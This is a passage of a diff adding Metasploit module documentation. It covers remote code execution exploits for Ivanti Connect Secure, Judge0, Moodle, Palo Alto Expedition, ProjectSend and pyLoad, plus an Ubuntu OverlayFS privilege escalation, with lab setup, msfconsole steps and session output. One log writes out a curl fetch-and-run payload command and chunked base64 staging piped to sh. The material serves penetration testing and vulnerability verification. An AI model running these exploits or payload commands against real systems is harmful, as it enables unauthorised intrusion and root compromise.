+[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
+[*] Sending stage (40004 bytes) to 172.16.199.1
+[+] Deleted 1nZaWHvP
+[+] Deleted kFAqQcbWxs.php
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60031) at 2024-11-11 10:42:06 -0800
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : c2064983b0e1
+OS          : Linux c2064983b0e1 6.10.11-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Oct  3 10:19:48 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+
+This module exploits a CRLF injection vulnerability in Ivanti Connect Secure to
+achieve remote code execution (CVE-2024-37404). Versions prior to 22.7R2.1 are
+vulnerable. Note that Ivanti Policy Secure versions prior to 22.7R1.1 are also
+vulnerable but this module doesn't support this software.
+
+Valid administrative credentials are required. A non-administrative user is also
+required and can be created using the administrative account, if needed.
+
+Finally, the `Client Log Upload` feature needs to be enabled. This can also
+be done using the administrative interface (see the Installation Steps section
+below), if it is not enabled already.
+
+### Process Overview
+
+First, the module will log into the administrative interface and check if the version
+is vulnerable. Then, it will connect to the user interface using non-privileged
+credentials and upload a log file archive containing the payload. This file is
+stored as a known path on the server, which can be retrieved from the
+administrative interface. Then, it leverages the CRLF vulnerability by creating
+a Certificate Signing Request and passing a specially crafted OpenSSL
+configuration. This configuration instructs OpenSSL to use a custom
+cryptographic engine, which points to the log file path (our payload). The
+payload is immediately executed, giving RCE as the root user on the appliance.
+
+This has been successfully tested against Ivanti Connect Secure version 22.3R1 (build 1647).
+
+### Installation Steps
+Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series)
+with a vulnerable Ivanti Connect Secure installed.
+
+Note that it is not possible to download a trial version of a Virtual Appliance
+unless you contact sales and request a demo.
+
+Log into to the admin interface (https:/<IP>/admin) to proceed with the following requirements:
+
+#### Create a normal user
+- In the `Authentication` menu, select `Auth. Servers`.
+- Select the `System Local` `Authentication/Authorization Servers` or any
+  server with the type `Local Authentication`. Don't select the
+  `Administrators` server since we need a non-administrative account.
+- Click on the `Users` tab and then `New`.
+- Fill the registration form and click `Save Changes`.
+
+#### Enable Client Log
+- Go to `Users` > `User Roles` and click on the `Users` role.
+- Go to `General` > `Session Options`.
+- Select `Enable Upload Logs` under the `Upload logs` section.
+- Click `Save Changes`.
+
+
+## Verification Steps
+1. Start msfconsole
+1. Do: `use linux/http/ivanti_connect_secure_rce_cve_2024_37404`
+1. Do: `run verbose=true lhost=<local host> rhosts=<remote host> admin_username=<admin username> admin_password=<admin password> username=<normal user> password=<user password>`
+1. You should get a Meterpreter session
+1. Make sure the admin and the normal user have been logged out by logging in
+   the web interfaces with a web browser (you should have any warning saying a
+   session is already active)
+1. Make sure the cleanup has been done correctly by checking `System` > `Log/Monitoring`
+
+
+## Options
+
+### ADMIN_USERNAME
+Administrative username to authenticate with.
+
+### ADMIN_PASSWORD
+Administrator password to authenticate with.
+
+### USERNAME
+Normal user username to authenticate with.
+
+### PASSWORD
+Normal user password to authenticate with.
+
+
+## Scenarios
+
+### Ivanti Connect Secure version 22.3R1 (build 1647)
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_37404) > run verbose=true lhost=192.168.211.69 rhosts=192.168.211.200 admin_username=msfadmin admin_password=1234567890 username=msfuser password=1234567890
+
+[*] Started reverse TCP handler on 192.168.211.69:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Login to the administrative interface with username 'msfadmin' and password '1234567890'...
+[!] The admin msfadmin is already logged in
+[*] Getting the version...
+[+] Found version 22.3R1 (build 1647)
+[+] The target appears to be vulnerable.
+[*] Uploading the payload...
+[*] Login to the user interface with username 'msfuser' and password '1234567890'...
+[*] Uploading the log file...
+[*] Logging the user out...
+[*] Getting the log file name...
+[*] Triggering the payload...
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.211.200
+[*] Cleaning up...
+[*] Deleting the log file (payload)...
+[*] Logging the administrator out...
+[*] Meterpreter session 3 opened (192.168.211.69:4444 -> 192.168.211.200:50210) at 2024-10-29 16:43:35 +0100
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.211.200
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```
@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+Judge0 does not account for symlinks placed inside the sandbox directory,
+which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
+
+The vulnerability affects:
+
+    * Judge0 <= 1.13.0
+
+This module was successfully tested on:
+
+    * Judge0(v1.13.0) installed with Docker on Ubuntu 20.0.4
+
+
+### Installation
+
+1. (Optional) Set cgroup to v1
+```bash
+  sudo nano /etc/default/grub
+  # add this line at the top, and save:
+  GRUB_CMDLINE_LINUX="systemd.unified_cgroup_hierarchy=0"
+  sudo update-grub
+  sudo reboot
+```
+
+2. Install Judge0
+```bash
+  wget https://github.com/judge0/judge0/releases/download/v1.13.0/judge0-v1.13.0.zip
+  unzip judge0-v1.13.0.zip
+  cd judge0-v1.13.0
+```
+
+3. Start Judge0
+```bash
+  docker compose up
+```
+
+4. (Optional) When Judge0 does not work, try this
+```bash
+  docker compose up --force-recreate server
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > options
+
+Module options (exploit/linux/http/judge0_sandbox_escape_cve_2024_28189):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    2358             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JRzyWcrcJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > run lhost=192.168.56.1 rhost=192.168.56.15
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version 1.13.0 detected, which is vulnerable
+[+] The target appears to be vulnerable.
+[*] Writing cron job to /etc/cron.d/dUTuziNy
+[*] Use language: 77, COBOL (GnuCOBOL 2.2)
+[+] Deleted /etc/cron.d/dUTuziNy
+[+] Deleted /root/SVENuNNy
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:49024) at 2024-10-29 12:56:04 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.18.0.5
+OS           : Debian 10.2 (Linux 5.4.0-196-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/root
+meterpreter > 
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution.
+By default, the application will run in the context of www-data, so only a limited shell can be obtained.
+
+Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an
+existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include
+`Teacher` and `Administrator`, but might differ depending on the specific deployment and configuration.
+
+Affected versions include:
+* 4.4 to 4.4.1
+* 4.3 to 4.3.5
+* 4.2 to 4.2.8
+* 4.1 to 4.1.11
+
+Moodle published an advisory [here](https://moodle.org/mod/forum/discuss.php?d=461193).
+
+The original advisory is available [here](https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/), and a more detailed writeup is
+available [here](https://blog.redteam-pentesting.de/2024/moodle-rce/).
+
+## Testing
+
+Legacy releases from Moodle can be obtained from [here](https://download.moodle.org/releases/legacy/).
+An installation guide is available [here](https://docs.moodle.org/404/en/Step-by-step_Installation_Guide_for_Ubuntu).
+
+**Successfully tested on**
+
+- Moodle v4.4.1 on Ubuntu 20.04 LTS
+
+## Verification Steps
+
+1. Deploy Moodle
+2. Start `msfconsole`
+3. `use exploit/linux/http/moodle_rce`
+4. `set USERNAME <USER>`
+5. `set PASSWORD <PASSWORD>`
+6. `set CMID <ID>`
+7. `set COURSEID <ID>`
+8. `set RHOSTS <IP>`
+9. `set LHOST <IP>`
+10. `exploit`
+
+## Options
+
+### USERNAME
+The username to authenticate with in Moodle.
+
+### PASSWORD
+The password for the user.
+
+### CMID
+The course module ID. Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course
+(e.g., IP>/moodle/mod/quiz/edit.php?cmid=4).
+
+### COURSEID
+The course ID. Can be retrieved from the URL when the course is selected (e.g., <IP>/moodle/course/view.php?id=3).
+
+## Scenarios
+
+Running the module against Moodle v4.4.1 should result in an output similar to the following:
+
+```
+msf6 > use exploit/linux/http/moodle_rce 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/moodle_rce) > set USERNAME testuser
+USERNAME => testuser
+msf6 exploit(linux/http/moodle_rce) > set PASSWORD iusldbf843498fKJASD
+PASSWORD => iusldbf843498fKJASD
+msf6 exploit(linux/http/moodle_rce) > set CMID 2
+CMID => 2
+msf6 exploit(linux/http/moodle_rce) > set COURSEID 2
+COURSEID => 2
+msf6 exploit(linux/http/moodle_rce) > set RHOSTS 192.168.217.141
+RHOSTS => 192.168.217.141
+msf6 exploit(linux/http/moodle_rce) > set LHOST 192.168.217.128
+LHOST => 192.168.217.128
+msf6 auxiliary(exploit/linux/http/moodle_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.217.128:4444 
+[*] Obtaining MoodleSession and logintoken...
+[+] Server reachable.
+[*] Authenticating as testuser...
+[*] Successfully authenticated.
+[*] Obtaining sesskey, courseContextId, and category...
+[*] Injecting command...
+[*] Sending stage (3045380 bytes) to 192.168.217.141
+[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
+[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/moodle_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.217.141
+OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+  
+meterpreter > getuid 
+Server username: www-data
+```
@@ -0,0 +1,113 @@
+## Vulnerable Application
+
+This module exploits two vulnerabilities in Palo Alto Expedition to obtain a remote shell. The first vulnerability, CVE-2024-5910, allows to
+reset the password of the admin user. The second vulnerability, CVE-2024-9464, is an authenticated OS command injection.
+
+When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will
+first try to reset the admin password and then perform the OS command injection. In a default installation, commands will get executed in
+the context of www-data.
+
+Note: If no credentials are available, the module will attempt to reset the admin password. For this, the parameter RESET_ADMIN_PASSWD must
+explicitly be set to true.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool).
+
+Installation instructions are available [here]
+(https://live.paloaltonetworks.com/t5/expedition-articles/expedition-documentation/ta-p/215619?attachment-id=13781).
+
+**Successfully tested on**
+
+- Expedition v1.2.91 on Ubuntu Server 20.04.1.
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > msf6 > use exploit/linux/http/paloalto_expedition_rce 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/paloalto_expedition_rce) > set RHOSTS <IP>
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
+```
+
+You should get a meterpreter session in the context of `www-data`.
+
+## Options
+
+### USERNAME
+Username for authentication, if available.
+
+### PASSWORD
+Password for the associated user.
+### WRITABLE_DIR
+A writable location for the exploit to stage the command payload.
+
+### RESET_ADMIN_PASSWD
+If the username and password are not specified, the module will attempt to reset the admin password to the default password `paloalto`. This
+is also done to authenticate and retrieve the exact version information, in case no credentials have been provided. As this alters the
+configuration of the target system, the `RESET_ADMIN_PASSWD` parameter serves as a safeguard that must explicility set to true before the
+reset endpoint is being invoked.
+
+## Scenarios
+
+Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using curl or wget as a fetch command, should result in an output
+similar to the following:
+
+```
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit 
+
+[*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
+[*] Fetch handler listening on 192.168.137.204:8080
+[*] HTTP server started
+[*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
+[+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
+[*] Version retrieved: 1.2.91
+[+] The target appears to be vulnerable.
+[*] Command chunk size = 30
+[+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
+[*] Adding a new cronjob...
+[*] Staging chunk 1 of 9
+[*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
+[*] Staging chunk 2 of 9
+[*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
+[*] Staging chunk 3 of 9
+[*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
+[*] Staging chunk 4 of 9
+[*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
+[*] Staging chunk 5 of 9
+[*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
+[*] Staging chunk 6 of 9
+[*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
+[*] Staging chunk 7 of 9
+[*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
+[*] Staging chunk 8 of 9
+[*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
+[*] Staging chunk 9 of 9
+[*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
+[+] Command staged; command execution requires a timeout and will take a few seconds.
+[*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
+[*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
+[*] Sending payload to 192.168.137.205 (curl/7.68.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.137.205
+[*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
+[*] Check thy shell.
+
+meterpreter > sysinfo
+Computer     : 192.168.137.205
+OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+ProjectSend is a web application used for sharing files with clients.
+
+Due to POST parameters being executed before checking user permissions,
+it is possible to perform a series of actions that can result in unauthenticated Remote Code Execution (RCE)
+on vulnerable versions of ProjectSend.
+
+This module has been tested against ProjectSend versions r1295 through r1605 on Linux.
+
+The easiest way to obtain a vulnerable version of ProjectSend is by deploying it using Docker, as pre-made images exist for the software.
+The following Docker Compose file can be used to set up a vulnerable environment.
+
+```
+---
+    services:
+      projectsend:
+        image: lscr.io/linuxserver/projectsend:version-r1605
+        container_name: projectsend
+        environment:
+          - PUID=1000
+          - PGID=1000
+          - TZ=Etc/UTC
+          - MAX_UPLOAD=5000
+        volumes:
+          - ./projectsend/config:/config
+          - ./projectsend/data:/data
+        ports:
+          - 80:80
+        restart: unless-stopped
+      db:
+        image: mariadb
+        restart: unless-stopped
+        container_name: db
+        volumes:
+          - ./mariadb_data:/var/lib/mysql
+        environment:
+          MYSQL_ROOT_PASSWORD: password
+          MYSQL_DATABASE: projectsend
+          MYSQL_USER: projectsend
+          MYSQL_PASSWORD: projectsend
+```
+After launching the containers, ProjectSend requires an initial configuration,
+which can be completed by accessing it via port 80 on localhost.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/projectsend_unauth_rce`
+4. Set remote hosts: `set RHOSTS <ip>`
+5. Set remote port: `set RPORT <port>`
+6. Set the path to ProjectSend: `set TARGETURI <URI>`
+7. Set local host: `set LHOST <local ip>`
+8. Do: `run`
+9. You should get a shell
+
+```
+msf6 exploit(linux/http/projectsend_unauth_rce) > options
+
+Module options (exploit/linux/http/projectsend_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The TARGETURI for ProjectSend
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.20     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP Command
+```
+
+## Options
+N/A - Only default options.
+
+## Scenarios
+```
+msf6 exploit(linux/http/projectsend_unauth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.20:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Client registration successfully enabled
+[+] User alvin.padberg created with password lrASo3iM
+[*] Disabling upload restrictions...
+[*] Logging in as alvin.padberg...
+[+] Logged in as alvin.padberg
+[+] Successfully uploaded PHP file: sX1A4FCH.php
+[*] Sending stage (39927 bytes) to 192.168.1.20
+[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.20:56675) at 2024-09-23 19:01:29 +0200
+[*] Logging in as alvin.padberg...
+[+] Logged in as alvin.padberg
+[+] Client registration successfully disabled
+[*] Enabling upload restrictions...
+
+meterpreter > sysinfo
+Computer    : 1480205e55c2
+OS          : Linux 1480205e55c2 6.6.26-linuxkit #1 SMP Sat Apr 27 04:13:19 UTC 2024 aarch64
+Meterpreter : php/linux
+```
@@ -0,0 +1,147 @@
+## Vulnerable Application
+CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate
+javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference
+to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions
+and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
+is the latest version of js2py which was released Nov 6, 2022.
+
+CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
+download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
+it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
+This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
+can bypass this restriction in order to access the API to achieve unauth RCE.
+
+## Verification Steps
+
+1. Start a vulnerable instance of pyLoad using docker
+2. Start msfconsole
+3. Run: `use exploit/linux/http/pyload_js2py_cve_2024_39205`
+4. Set the `RHOST`, `LHOST` `PAYLOAD` and payload associated options
+5. Run: `run`
+
+### Docker Setup
+
+```
+docker run -d \
+  --name=pyload-ng \
+  -e PUID=1000 \
+  -e PGID=1000 \
+  -e TZ=Etc/UTC \
+  -p 8000:8000 \
+  -p 9666:9666 \
+  --restart unless-stopped \
+  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev85
+```
+
+## Scenarios
+### ARCH_CMD PyLoad 0.5.0b3.dev85 (with js2py 0.74)
+```
+msf6 > use linux/http/pyload_js2py_cve_2024_39205
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > options
+
+Module options (exploit/linux/http/pyload_js2py_cve_2024_39205):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9666             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      FTdcATmGGDpa     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56080) at 2024-11-12 15:47:19 -0800
+
+meterpreter > getruid
+[-] Unknown command: getruid. Did you mean getuid? Run the help command for more details.
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 6.10.11-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### ARCH_X64 PyLoad 0.5.0b3.dev85 (with js2py 0.74)
+```
+msf6 > use linux/http/pyload_js2py_cve_2024_39205
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set target 1
+target => 1
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_cve_2024_39205) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:56088) at 2024-11-12 15:48:42 -0800
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           :  (Linux 6.10.11-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,157 @@
+## Description
+
+CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of 
+capabilities while overlaying filesystems. On most Linux Kernels during the execution of
+ `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
+way that limits them to the current namespace. However, on some versions of the Ubuntu kernel
+ `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. 
+
+When a new namespace is created the user will technically be "root" within that given 
+namespace. This module will take advantage of this by setting the `CAP_SETUID` capability 
+on a system binary. It will then perform filesystem overlay, copying the binary into the lower
+directory. Because of the flaws described above when the binary is transferred into the upper
+directory its capabilities will not be sanitized and persist in the "normal" namespace. 
+
+## Vunerable Application
+
+These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
+and kernel versions, as described in the list below. 
+
+Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629)
+
+Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)
+
+Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)
+
+The user can download a vulnerable version, for example:
+
+```
+sudo apt update
+sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
+reboot
+```
+While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically.
+Be sure to take the system offline to prevent the vulnerabilities from silently being patched. 
+
+This module has successfully been tested on the following:
+
+Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic
+
+Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws
+
+## Verification Steps
+
+1). Start `msfconsole`
+
+2). Get a session on a vulnerable system
+
+3). Use `exploit/linux/local/gameoverlay_privesc`
+
+4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1) 
+`set target 1`
+
+5). Set session `set session [SESSION]`
+
+5). Do. `run`
+
+6). You should get a new session running as root. 
+
+## Options
+
+### Payload File Name
+Name of the file storing the payload, default is random.
+
+### Writable Dir
+The name of a directory with write permissions, default is `/tmp`. This will be where the 
+payload file will be created if necessary. Additionally during the exploit a series of directories will be
+created here to perform the filesystem overlaying. 
+
+## Scenarios
+
+You have a non-root session on one of the systems described above. Please note that this 
+module will automatically run checks to determine if the system is vulnerable, you can disable 
+this with `set AutoCheck False`. 
+
+```
+msf6 exploit(linux/local/gameoverlay_privesc) >
+[*] Sending stage (3045380 bytes) to 10.5.132.129
+[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600
+
+msf6 exploit(linux/local/gameoverlay_privesc) > set session 3
+session => 3
+msf6 exploit(linux/local/gameoverlay_privesc) > show options
+
+Module options (exploit/linux/local/gameoverlay_privesc):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   PayloadFileName  pSueaCXrnzH      yes       Name of payload
+   SESSION          3                yes       The session to run this module on
+   WritableDir      /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
